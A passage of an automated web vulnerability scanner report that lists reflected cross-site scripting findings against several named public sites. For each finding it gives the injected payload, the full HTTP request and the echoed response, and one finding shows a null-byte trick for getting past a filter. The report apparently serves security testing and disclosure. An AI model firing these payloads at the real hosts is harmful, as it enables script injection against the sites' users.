The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2 was submitted in the adminOver parameter. This input was echoed as ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videohub/mpf/config.prodXml?player=index09&adminOver=3805638ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2&xhr=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; broadbandAccess=espn3-false%2Cnetworks-false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 21:43:51 GMT
Content-Type: text/xml;charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 21:43:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Wed, 23 Feb 2011 21:52:11 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 6404


<mpf>


   <globalPlayerConfig adminOver="3805638ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2">

       <freewheel>
           <debugMode>QUIET</debugMode>
           <networkID
...[SNIP]...

1.128. http://forecast.weather.gov/product.php [highlight parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forecast.weather.gov
Path:   /product.php

Issue detail

The value of the highlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77c1"%20a%3db%20111d93b24a1 was submitted in the highlight parameter. This input was echoed as b77c1" a=b 111d93b24a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /product.php?site=NWS&issuedby=GYX&product=AFD&format=CI&version=1&glossary=1&highlight=offb77c1"%20a%3db%20111d93b24a1 HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 8
Date: Sat, 26 Feb 2011 02:11:18 GMT
Content-Length: 23466
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:26:18 GMT
Cache-Control: max-age=900
X-Pad: work around browser bug
Server: Apache
Via: 1.1 wwwcache-2 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?site=NWS&issuedby=GYX&product=AFD&format=CI&version=2&glossary=1&highlight=offb77c1" a=b 111d93b24a1">
...[SNIP]...

1.129. http://games.espn.go.com/frontpage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3539<script>alert(1)</script>45440a8342f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpagee3539<script>alert(1)</script>45440a8342f/ HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 132
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpagee3539<script>alert(1)</script>45440a8342f/</BODY></HTML>

1.130. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c463'-alert(1)-'ba5a810b394 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM7D_NzMzMzMzsPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAhS4AGgAAAAA.&tt_code=vert-63&udj=uf%28%27a%27%2C+10117%2C+1298497097%29%3Buf%28%27c%27%2C+49291%2C+1298497097%29%3Buf%28%27r%27%2C+194676%2C+1298497097%29%3Bppv%289239%2C+%278343660854450163119%27%2C+1298497097%2C+1299706697%2C+49291%2C+25553%29%3B&cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394&referrer=http://www.komonews.com/weather&pp=TWV-SQAH9ygK7F4kAKxMFELM_cWJgyGndva2MQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQggEXY2EtcHViLTI3MzM5OTQzMTU5NjI2MzOyARB3d3cua29tb25ld3MuY29tugEKMzAweDI1MF9hc8gBCdoBH2h0dHA6Ly93d3cua29tb25ld3MuY29tL3dlYXRoZXKYArQBwAIEyALE5swWqAMB6AM_6AO4KugDvAToA7kp9QMAAABE9QMgAAAA%26num%3D1%26sig%3DAGiWqtys2Mfisw0UXTlYtNy6D11F57DF6w%26client%3Dca-pub-2733994315962633%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIr7gCEAoYASABKAEwtPyV6wQQtPyV6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ix2hdXO=Pl'/PbHH*j^3)C6XZhUC$K!+.kQ]f9jkt)1ur:'MK@Nx4=0i7Jr<lXda`#HI#!f

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d7oDDJ$2YVA<8r(ccEO=Pl'/PbFsX??`gC6X[1UC$K!+.kQaf9jkt):tzmY(.j84K]4XtqIGp!x$aQ6a4:5; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 23 Feb 2011 21:42:44 GMT
Content-Length: 1516

document.write('<a href="http://ib.adnxs.com/click/CtejcD0Kxz8K16NwPQrHPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAHilpjAAAAAA./cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394/referrer=http%3A%2F%2Fwww.komonews.com%2Fweather/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQg
...[SNIP]...

1.131. http://insider.espn.go.com/mlb/blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /mlb/blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a47a"><script>alert(1)</script>c61540aaab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /mlb/blog?name=stark_jayson&id=6154671&3a47a"><script>alert(1)</script>c61540aaab8=1 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW06
Set-Cookie: SWID=6E9C9082-DD07-42E9-8207-8AAC74C9B6A1; path=/; expires=Sat, 26-Feb-2031 02:13:25 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 02:18:25 GMT
Content-Length: 63928
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Tue, 08 Mar 2011 02:13:25 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?name=stark_jayson&amp;id=6154671&amp;3a47a"><script>alert(1)</script>c61540aaab8=1&amp;action=login&amp;appRedirect=http://insider.espn.go.com/mlb/blog?name=stark_jayson&id=6154671&3a47a">
...[SNIP]...

1.132. https://login.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://login.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00185a3"><a>0b39656ae9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185a3"><a>0b39656ae9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00185a3"><a>0b39656ae9=1 HTTP/1.1
Host: login.barracudanetworks.com
Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 14:38:30 GMT
Server: Apache
Set-Cookie: CLOUD_LOCALE=en_US; expires=Thu, 25-Aug-2011 14:38:30 GMT; path=/; domain=.barracudanetworks.com
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
Expires: Fri, 26 Feb 2010 09:38:30 -0500
Cache-Control: no-store
Pragma: no-cache
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
X-Cloud-Auth: 0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5832

<!DOCTYPE html>
<!-- Portal Version 11.02 29121 -->
<html>
   <head>
       <meta charset="UTF-8">
       <meta http-equiv="Content-Version" content="1.1.0">
       <title>Sign In > Barracuda Networks</title>
       
       <li
...[SNIP]...
<a href="/new_account/?service=https://login.barracudanetworks.com/?%00185a3"><a>0b39656ae9=1">
...[SNIP]...

1.133. http://mf.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e3a'%3balert(1)//54509da0ddf was submitted in the h parameter. This input was echoed as 66e3a';alert(1)//54509da0ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300&h=25066e3a'%3balert(1)//54509da0ddf&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:39 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25066e3a';alert(1)//54509da0ddf" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.134. http://mf.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c45"%3balert(1)//f523be3e8b3 was submitted in the pid parameter. This input was echoed as e9c45";alert(1)//f523be3e8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790e9c45"%3balert(1)//f523be3e8b3&w=300&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:35 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790e9c45";alert(1)//f523be3e8b3&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAu
...[SNIP]...

1.135. http://mf.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 934f2'%3balert(1)//25e8b63311e was submitted in the w parameter. This input was echoed as 934f2';alert(1)//25e8b63311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300934f2'%3balert(1)//25e8b63311e&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
